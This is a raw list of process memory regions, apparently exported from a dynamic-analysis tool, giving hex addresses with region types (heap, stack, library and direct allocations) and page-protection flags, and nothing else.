heap
page read and write
2EBF000
stack
page read and write
24838000
heap
page read and write
24822000
heap
page read and write
37BBC000
heap
page read and write
726B000
stack
page read and write
450000
heap
page read and write
262C1318000
heap
page read and write
219F000
stack
page read and write
4B7E000
stack
page read and write
2484E000
heap
page read and write
2A8B4000
heap
page read and write
7580000
heap
page read and write
2924000
heap
page read and write
5398000
trusted library allocation
page read and write
4D6F000
stack
page read and write
74FD000
stack
page read and write
64B0000
trusted library allocation
page execute and read and write
D1A000
heap
page read and write
1E660000
heap
page read and write
321D000
trusted library allocation
page execute and read and write
765727E000
unkown
page readonly
8CF000
stack
page read and write
27E4000
direct allocation
page read and write
2BA4000
unkown
page read and write
5D53000
heap
page read and write
CF4000
heap
page read and write
2E91000
heap
page read and write
3212000
heap
page read and write
1701000
trusted library allocation
page read and write
2483C000
heap
page read and write
344D000
heap
page read and write
2D8E000
stack
page read and write
5D5C000
stack
page read and write
2924000
heap
page read and write
CBE000
heap
page read and write
34D2000
trusted library allocation
page read and write
EC2000
heap
page read and write
B30000
heap
page read and write
2F79000
heap
page read and write
2E91000
heap
page read and write
6E0000
heap
page read and write
3340000
heap
page read and write
846F000
stack
page read and write
2E91000
heap
page read and write
790000
unkown
page readonly
59E000
stack
page read and write
5D59000
heap
page read and write
2924000
heap
page read and write
DF5000
unkown
page write copy
32BF000
stack
page read and write
7510000
heap
page read and write
800000
heap
page read and write
32F9000
heap
page read and write
70C6000
heap
page read and write
80A000
unkown
page write copy
2924000
heap
page read and write
24840000
heap
page read and write
4720000
unkown
page read and write
2CB4000
heap
page read and write
2C4E000
heap
page read and write
2BA4000
unkown
page read and write
6F9E000
stack
page read and write
3618000
trusted library allocation
page read and write
344E000
trusted library allocation
page read and write
5DAD000
heap
page read and write
1360000
trusted library allocation
page read and write
7657E7B000
stack
page read and write
262C1400000
trusted library allocation
page read and write
76576FE000
stack
page read and write
3A10000
heap
page read and write
7621000
heap
page read and write
262BC260000
trusted library allocation
page read and write
68C29000
unkown
page write copy
57EE000
stack
page read and write
2484E000
heap
page read and write
43B9000
trusted library allocation
page read and write
E84000
heap
page read and write
306F000
stack
page read and write
375BC000
stack
page read and write
697000
heap
page read and write
7042000
heap
page read and write
278C000
direct allocation
page read and write
F18000
heap
page read and write
DCE000
stack
page read and write
418000
unkown
page write copy
77CE000
stack
page read and write
2E91000
heap
page read and write
870000
heap
page read and write
68AD0000
unkown
page readonly
5472000
unkown
page read and write
2160000
heap
page read and write
41E000
unkown
page write copy
650000
heap
page read and write
177E000
stack
page read and write
59C000
stack
page read and write
2B70000
heap
page read and write
630000
heap
page read and write
780000
heap
page read and write
765000
heap
page read and write
2485B000
heap
page read and write
2BA4000
unkown
page read and write
1760000
trusted library allocation
page read and write
3200000
trusted library allocation
page read and write
4180000
trusted library allocation
page read and write
418000
unkown
page write copy
2C8B000
heap
page read and write
5DBA000
heap
page read and write
7657EFE000
stack
page read and write
655000
heap
page read and write
66FE000
stack
page read and write
70A0000
heap
page read and write
5DC6000
heap
page read and write
30980000
heap
page read and write
766000
unkown
page read and write
105D6000
direct allocation
page readonly
5DBD000
heap
page read and write
3200000
trusted library allocation
page read and write
636000
unkown
page execute and read and write
790000
unkown
page readonly
EC7000
heap
page read and write
2E91000
heap
page read and write
2483D000
heap
page read and write
262BBC13000
heap
page read and write
5ED7000
heap
page read and write
218E000
stack
page read and write
600000
heap
page read and write
5DC2000
heap
page read and write
FCB000
stack
page read and write
32C6000
trusted library allocation
page read and write
334E000
stack
page read and write
635E000
stack
page read and write
68CB0000
unkown
page readonly
C90000
heap
page read and write
EAC000
heap
page read and write
6671000
trusted library allocation
page read and write
2BA4000
unkown
page read and write
2CCB000
unkown
page read and write
375F000
trusted library allocation
page read and write
41C9000
trusted library allocation
page read and write
262C1243000
heap
page read and write
29CE000
stack
page read and write
2EC6000
heap
page read and write
449D000
trusted library allocation
page read and write
2924000
heap
page read and write
5DDE000
heap
page read and write
CC3000
heap
page read and write
7300000
heap
page read and write
2F7F000
heap
page read and write
5DCF000
heap
page read and write
EC7000
heap
page read and write
2F7F000
heap
page read and write
401000
unkown
page execute read
27CE000
direct allocation
page read and write
D33000
heap
page read and write
34F5000
trusted library allocation
page read and write
765638B000
stack
page read and write
791000
unkown
page execute read
3110000
trusted library allocation
page read and write
5DC7000
heap
page read and write
2C83000
heap
page read and write
2E91000
heap
page read and write
82F000
stack
page read and write
82F0000
trusted library allocation
page read and write
6D0000
unkown
page readonly
AA0000
heap
page read and write
3220000
heap
page read and write
4175000
trusted library allocation
page read and write
262BC370000
trusted library section
page read and write
9D0000
heap
page read and write
525E000
direct allocation
page read and write
EC6000
heap
page read and write
408A000
heap
page read and write
24854000
heap
page read and write
E7C000
unkown
page read and write
2924000
heap
page read and write
F09000
heap
page read and write
7BBD000
stack
page read and write
34BA000
trusted library allocation
page read and write
EEE000
stack
page read and write
35D0000
heap
page read and write
1E771000
heap
page read and write
EC9000
heap
page read and write
6750000
trusted library allocation
page read and write
2E91000
heap
page read and write
2484E000
heap
page read and write
24831000
heap
page read and write
6F5000
heap
page read and write
2F99000
heap
page read and write
1935000
heap
page read and write
2484E000
heap
page read and write
FEE000
stack
page read and write
3420000
heap
page read and write
2764000
direct allocation
page read and write
3297000
trusted library allocation
page read and write
5DEE000
stack
page read and write
78C000
stack
page read and write
ABE000
stack
page read and write
D04000
heap
page read and write
3CE6000
heap
page read and write
2DF0000
heap
page read and write
7F7E000
stack
page read and write
68E90000
unkown
page read and write
4A1C000
unkown
page read and write
3A27000
heap
page read and write
2924000
heap
page read and write
262C1450000
remote allocation
page read and write
37BA8000
heap
page read and write
24854000
heap
page read and write
5E02000
heap
page read and write
550000
heap
page read and write
13C8000
heap
page read and write
143E000
stack
page read and write
4397000
trusted library allocation
page read and write
5EE7000
heap
page read and write
36A20000
trusted library allocation
page read and write
1743000
trusted library allocation
page read and write
2C30000
unkown
page read and write
41C0000
heap
page read and write
3724000
trusted library allocation
page read and write
DFE000
unkown
page readonly
39C000
stack
page read and write
2950000
heap
page read and write
262C1311000
heap
page read and write
2FED000
trusted library allocation
page execute and read and write
92F000
stack
page read and write
7A40000
heap
page read and write
2BA4000
unkown
page read and write
282F000
unkown
page read and write
2E91000
heap
page read and write
791000
unkown
page execute read
76F000
unkown
page read and write
768A000
stack
page read and write
14A4000
heap
page read and write
435F000
trusted library allocation
page read and write
10000000
direct allocation
page read and write
7087000
heap
page read and write
6DF000
stack
page read and write
2924000
heap
page read and write
5DBD000
heap
page read and write
281D000
direct allocation
page read and write
88E000
stack
page read and write
346C000
trusted library allocation
page read and write
7053000
heap
page read and write
74F0000
heap
page execute and read and write
2F87000
heap
page read and write
2924000
heap
page read and write
312B000
heap
page read and write
1D6E000
stack
page read and write
298A000
heap
page read and write
2485C000
heap
page read and write
10000000
direct allocation
page read and write
40A000
unkown
page write copy
7E7E000
stack
page read and write
61F000
heap
page read and write
401000
unkown
page execute read
9A000
stack
page read and write
2484F000
heap
page read and write
2924000
heap
page read and write
38B0000
heap
page read and write
5EBD000
heap
page read and write
6465000
trusted library allocation
page read and write
5DDE000
heap
page read and write
1A2F000
stack
page read and write
41F9000
trusted library allocation
page read and write
6BC000
heap
page read and write
ED8000
heap
page read and write
262C133C000
heap
page read and write
716A000
stack
page read and write
4148000
trusted library allocation
page read and write
3210000
heap
page read and write
5DDE000
heap
page read and write
378FC000
stack
page read and write
3278000
heap
page read and write
37BB2000
heap
page read and write
7AF000
stack
page read and write
3434000
trusted library allocation
page read and write
69D000
heap
page read and write
408E000
heap
page read and write
6A2000
heap
page read and write
2485C000
heap
page read and write
6220000
trusted library allocation
page read and write
1380000
trusted library allocation
page read and write
422000
unkown
page write copy
2924000
heap
page read and write
E7A000
unkown
page read and write
2E91000
heap
page read and write
35FE000
trusted library allocation
page read and write
C10000
heap
page read and write
2EC0000
heap
page read and write
15AF000
stack
page read and write
4D62000
unkown
page read and write
27DE000
unkown
page read and write
5DBA000
heap
page read and write
5D61000
heap
page read and write
DFE000
unkown
page readonly
276C000
stack
page read and write
171A000
heap
page read and write
12E0000
heap
page read and write
32F7000
heap
page read and write
31EE000
stack
page read and write
329D000
stack
page read and write
2E91000
heap
page read and write
43CE000
trusted library allocation
page read and write
BAF000
stack
page read and write
2C10000
heap
page read and write
21F0000
heap
page read and write
14A1000
heap
page read and write
D02000
heap
page read and write
2483B000
heap
page read and write
482A000
unkown
page read and write
1765000
trusted library allocation
page read and write
5DC2000
heap
page read and write
72D0000
trusted library allocation
page execute and read and write
2C6C000
heap
page read and write
3232000
heap
page read and write
400000
unkown
page readonly
2BA4000
unkown
page read and write
59BB000
stack
page read and write